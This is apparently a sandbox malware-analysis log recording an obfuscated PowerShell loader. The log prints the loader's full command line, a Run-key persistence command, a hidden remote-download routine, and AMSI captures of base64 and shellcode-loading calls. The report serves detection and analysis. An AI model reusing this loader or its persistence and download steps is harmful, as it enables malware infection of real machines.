Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mystery" /t REG_EXPAND_SZ /d "%Sundhedstjeneste% -windowstyle 1 $Uforligneliges155=(gi 'HKCU:\Software\Rnefolk\').GetValue('Noncooperation');%Sundhedstjeneste% ($Uforligneliges155)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mystery" /t REG_EXPAND_SZ /d "%Sundhedstjeneste% -windowstyle 1 $Uforligneliges155=(gi 'HKCU:\Software\Rnefolk\').GetValue('Noncooperation');%Sundhedstjeneste% ($Uforligneliges155)"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "Get-Service;$Unsegregated97='func';Get-History;$Unsegregated97+='t';Get-History;$Unsegregated97+='i';Get-History;$Unsegregated97+='on:';(ni -p $Unsegregated97 -n Desperates -value { param($Vanskeligt);$Batel=2;do {$Skraaplanernes+=$Vanskeligt[$Batel];$Batel+=3} until(!$Vanskeligt[$Batel])$Skraaplanernes});ConvertTo-Html;(ni -p $Unsegregated97 -n Afsvoret -value {param($Paliphrasia);.($Farsering) ($Paliphrasia)});ConvertTo-Html;$Fjernsynsudsendelser=Desperates 'udNHae et ..SpW';$Fjernsynsudsendelser+=Desperates 'ine bCeCAnL SiPeeH nPrT';$Shopped=Desperates 'hjMTeo VzBoiKel,ol a a/';$Livener89=Desperates 'AnTLel DsCe1 2';$Breaming=' r[ aNsiE .t .. .SH E.rrLiVUnI HcAqeN,p So.eiTonFatGem aAU NO,AStGC,EEyRDe]Gr:Pl:.xsErELic,nUXir ib,tScyT p ArTroUrTinoMaCD oS lA =Pu$ImLCoi.rVFle Sn OEBlRT.8Hl9';$Shopped+=Desperates 'Fl5 ,. s0Pe Ov(YaWReiAnn d aoRiw .sKi oNGlT r Fo1 0 l. H0Ke;S, hWfuiKnnUn6Fj4S.;Sy Anxr,6U.4 i;Sk ParRov.d: P1Le3Pu4Ao.Ep0 s)Ol S GVie AcSvkOuoEj/ C2 0 I1.e0 a0p 1 .0Un1Ov UdFTaiRerF ejefUnoWrxDd/,u1 k3U 4Th.Li0';$Batelgangstningen=Desperates 'V,UAaSSae.eRRa-AnA gMiEPiN CT';$Hepatic=Desperates ' Bh nt,rtOvpS s P:Rv/Sv/ SwFowT wIn..aaOreKununnA,aPiaP,rVat n. UdspeRe/Dow .p ,c ao hnentSpeKun,otP /Daf ti lF.eP s /MapdirTaiBevD aDatU eAl/g ddao Vw AnDel no a ndFi/ eGInlJoaFas ee MrUreGlnSudRee ,.Ruc Oh ,m';$Chatollet=Desperates 'Mo>';$Farsering=Desperates 'StIStE,iX';$Awatch='Perfideste';$aabenbaringsreligionen='\stinko.Tet';Afsvoret (Desperates 'D,$ SGAnl SO TB,paUnlV,:SnCCuAspr,aPHaeH TUnL BEFoSCiS B=do$DoeD n VS.:Soa upElpInDUnA mtY aKr+Tr$BraAdaC.bEke N,aBOrA,cR QILanTuGBrSO.r ee llH I.oGA,I.eOk n oeReN');Afsvoret (Desperates ' $ ogUpLSwo.ubNraShlSe:KlP aR.ho oC EUrDgeUR RHjE gkGlajalAndGosAg=Fi$TeHA eFopA aIsT liCacF ..aSMypAgltaIFotHe(C $ CCsthSgAT,TUno AlCulUdEP tPo)');Afsvoret (Desperates $Breaming);$Hepatic=$Procedurekalds[0];$Colberter=(Desperates 'Bo$NyG dLCho rb AASuLFr: PFSyAE rCoVInADrNSeDEkeI.=Rendee wEl-Drot b.ij tE McCrTK. Pes yRosBitFoe SMKl.R $Blf JOpE aRpoNP sSvyHanBaS.nU,rd SMeEPun FD,rEm LBes EEEnR');Afsvoret ($Colberter);Afsvoret (Desperates 'No$T F Sa ir qv Ga n odTieMa. BH oeJoaJodSlechrOpsTo[F $FeBK,aS.tIteKolCag paEnnA,gA sF,tSen liUdn og ePen L]Br= $R,SC h Ao DpBipO eE d');$Coumaphos=Desperates 'Kl$ IFUraForH v UaAcns,d.aeFi.ExD og w n ElFloSpaM dInF NiRel reSe(Ko$LkHSfe ApFoaSkt wiRec,p,Un$ .EBrfChfO r.aae y )';$Effray=$carpetless;Afsvoret (Desperates ' K$ SGUdL LO Tb FAPhlC,: UhSuaLuGBab.rUS T i=Ap(S.tgeeS,sI tS -OrpAfaMotteHVi S,$Une ,f AFRerLsa.nyBr)');while (!$Hagbut) {Afsvoret (Desperates 'Ma$YpgS lBrogebCaaInlS,: UBSklLaoBekBetStrYvyAfkSls T= e$.oD FieclS,iDeg FeA nSucU e SnSts') ;Afsvoret $Coumaphos;Afsvoret (Desperates 'Co[ToT lH rT,E,eA eD,riS nmhg f. StS HstR.ie UaStDGa]S :Br:i s ClMeEArE SpAr(M.4Ch0Tr0P.0D.)');Afsvoret (Desperates 'U $,eGS.lHjo eB eAInl r: kh aaTrgGlbAfuOlTTa=De(Frt Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mystery" /t REG_EXPAND_SZ /d "%Sundhedstjeneste% -windowstyle 1 $Uforligneliges155=(gi 'HKCU:\Software\Rnefolk\').GetValue('Noncooperation');%Sundhedstjeneste% ($Uforligneliges155)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mystery" /t REG_EXPAND_SZ /d "%Sundhedstjeneste% -windowstyle 1 $Uforligneliges155=(gi 'HKCU:\Software\Rnefolk\').GetValue('Noncooperation');%Sundhedstjeneste% ($Uforligneliges155)" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: indows\System.Core.pdbvyr_/m source: powershell.exe, 00000005.00000002.3377683667.00000000072A9000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Opkastendes)$gloBAL:ggekaGeRnES = [SySTEM.teXT.EnCODiNG]::ASCII.geTstriNG($ENWraPPeD)$glOBaL:cRoOkIng=$gGekAgerNeS.SubStRIng($TIlbEDt,$uNGrATed)<#Udfaldsport hydromedusoid Konfronter
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Hngetr $Spiffily40 $Overwinds), (Shaine @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Overskyllet = [AppDomain]::CurrentDomain.GetAssemblies()$global:Den
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Astrolabes)), $Formalitetssprgsmaalene).DefineDynamicModule($Dekuprarbejderne, $false).DefineType($Pseudocarp, $Udspecialiseret, [Syst
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Opkastendes)$gloBAL:ggekaGeRnES = [SySTEM.teXT.EnCODiNG]::ASCII.geTstriNG($ENWraPPeD)$glOBaL:cRoOkIng=$gGekAgerNeS.SubStRIng($TIlbEDt,$uNGrATed)<#Udfaldsport hydromedusoid Konfronter
